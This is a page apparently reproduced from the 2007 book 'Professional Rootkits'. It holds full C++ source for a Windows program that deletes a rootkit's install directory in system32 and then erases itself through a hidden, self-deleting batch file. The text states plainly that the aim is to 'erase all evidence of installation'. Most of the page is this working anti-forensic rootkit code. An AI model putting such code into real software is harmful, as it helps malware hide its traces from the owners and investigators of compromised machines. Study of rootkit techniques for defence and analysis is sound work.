Removing the Traces of an Installation


The Windows operating system does not provide a mechanism that allows a process to destroy its own image. This is because the image is protected while the process is running. Fortunately, this is not a limitation when using batch files, so an application that dynamically creates a batch file can erase all evidence of installation, provided the batch file is written to delete both its creator and itself.

The following example can be added to any custom installation application:

  #include <windows.h> #include <string> #include <vector> #include <direct.h> #include <malloc.h> #include <shellapi.h> using namespace std; typedef struct _DIRECTORY_STRUCT {  string path;  bool isdir;  vector<_DIRECTORY_STRUCT> subDirectories;  _DIRECTORY_STRUCT(const string& path, bool isdir = false):path(path), isdir(isdir){} } DIRECTORY_STRUCT; // Called by removeDirectory void fillDirStruct( DIRECTORY_STRUCT& root ) {  WIN32_FIND_DATA data;  memset( &data, 0, sizeof(data) );  HANDLE handle = FindFirstFile( root.path.c_str(), &data );  if(handle != ( HANDLE)NULL )   FindClose( handle );  root.isdir = ((data.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) != 0);  if(!root.isdir)   return;  string path = root.path;  path.append("\\*");  handle = FindFirstFile( path.c_str(), &data );      // skip "."  FindNextFile( handle, &data );                            // skip ".."  memset( &data, 0, sizeof(data) );  while( FindNextFile( handle, &data ) == TRUE )  {   path = root.path;   path.append( "\\" ).append( data.cFileName );   root.subDirectories.push_back( DIRECTORY_STRUCT( path ) );   memset( &data, 0, sizeof(data) );  };  FindClose(handle); } // Called by removeDirectory void removeFile( const char * filename ) {  if( !filename )   return ;  SetFileAttributes( filename, FILE_ATTRIBUTE_NORMAL );  DeleteFile( filename );  return ; } // Recursive function to delete a directory and all subdirectories void removeDirectory( string& path ) {  if( path.empty() )   return;  DIRECTORY_STRUCT dirStruct( path.c_str() );  fillDirStruct( dirStruct );  if( dirStruct.isdir )  {   for( unsigned int j = 0; j < dirStruct.subDirectories.size(); j ++ )   {    string dpath = dirStruct.subDirectories[j].path;    removeDirectory( dpath );   }   ::rmdir( path.c_str() );  }  else  {  removeFile( path.c_str() );  }  return; } static const char batchFileName[] = "uninstallRootkit.bat"; void SelfDestruct() {  // temporary batch file  static char batchFile[] =   ":Repeat\r\n"   "del \"%s\"\r\n"   "if exist \"%s\" goto Repeat\r\n"   "rmdir \"%s\"\r\n"   "del \"%s\"";  char modulename[MAX_PATH];  char temppath[MAX_PATH];  char folder[MAX_PATH];  GetTempPath( MAX_PATH, temppath );  strcat( temppath, batchFileName );  GetModuleFileName( NULL, modulename, MAX_PATH );  strcpy ( folder, modulename );  char *pb = strrchr( folder, '\\' );  if (pb != NULL)   *pb = 0;  HANDLE hf;  hf = CreateFile( temppath, GENERIC_WRITE, 0, NULL,   CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL );  if (hf != INVALID_HANDLE_VALUE)  {   DWORD len;   char *bat;   bat = (char*)alloca( strlen( batchFile ) +    strlen( modulename ) * 2 + strlen( temppath ) + 20 );   wsprintf( bat, batchFile, modulename, modulename, folder, temppath );   WriteFile( hf, bat, strlen( bat ), &len, NULL );   CloseHandle( hf );   ShellExecute( NULL, "open", temppath, NULL, NULL, SW_HIDE );  } } // Removes %system32%\MyRootkit, then removes itself int main(int argc, char* argv[]) {  char systemDirectory[ MAX_PATH + 1 ];  if( !GetSystemDirectory( systemDirectory, MAX_PATH + 1 ) )   return 1;  // Delete the install directory  string directoryToDelete;  directoryToDelete = systemDirectory;  directoryToDelete += "\\MyRootkit";  removeDirectory( directoryToDelete );  // Delete this program  SelfDestruct();  return 0; } 




Professional Rootkits
Professional Rootkits (Programmer to Programmer)
ISBN: 0470101547
EAN: 2147483647
Year: 2007
Pages: 229
Authors: Ric Vieler

Similar book on Amazon
Rootkits: Subverting the Windows Kernel
Rootkits: Subverting the Windows Kernel
A Guide to Kernel Exploitation: Attacking the Core
A Guide to Kernel Exploitation: Attacking the Core
Reversing: Secrets of Reverse Engineering
Reversing: Secrets of Reverse Engineering
Malware Analyst's Cookbook and DVD: Tools and Techniques for Fighting Malicious Code
Malware Analyst's Cookbook and DVD: Tools and Techniques for Fighting Malicious Code

flylib.com © 2008-2017.
If you may any questions please contact us: flylib@qtcs.net